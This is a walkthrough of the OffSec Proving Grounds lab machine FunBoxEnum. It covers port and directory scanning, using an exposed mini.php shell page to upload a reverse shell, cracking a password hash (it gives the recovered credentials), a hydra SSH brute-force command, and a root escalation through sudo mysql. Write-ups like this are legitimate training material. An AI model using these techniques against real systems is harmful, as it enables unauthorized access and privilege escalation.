OffSec PG - FunBoxEnum


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.29 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • icons/ (403)
  • javascript/ (403)
  • mini.php
  • robots.txt
  • phpmyadmin/

Robots txt file lists Enum_this_Box as allowed.


The webpage mini.php is actually a shell interface with some limited options. This was used to read the local flag. This also had the functionality to upload files. This was used to upload the pentest monkey’s reverse shell code and get full shell.

Privilege Escalation


Looked at the /etc/passwd file, the users of importance are → root, goat, harry, karla, lissy, sally and oracle. The user oracle’s entry is → oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash. Using John the Ripper to crack this gives the credentials oracle:hiphop. This did not work for ssh though.

Running hydra to brute-force other users by using → hydra -l karla -P /home/tanq/installations/SecLists/rockyou.txt ssh:// Ran linenum script for more enumeration, however, nothing useful was discovered. Tried user:user form of credentials for all users, which gave a success for goat:goat. This gives the user shell as user goat.


Looking at sudo -l to enumerate privilege of the goat user, they are allowed to run /usr/bin/mysql as root without any password. MySQL has a functionality for spawning a shell. Executing sudo /usr/bin/mysql gives the mysql shell and using \! bash in the mysql shell spawns a bash shell as the user root. This gives the root flag.

This post is licensed under CC BY 4.0 by the author.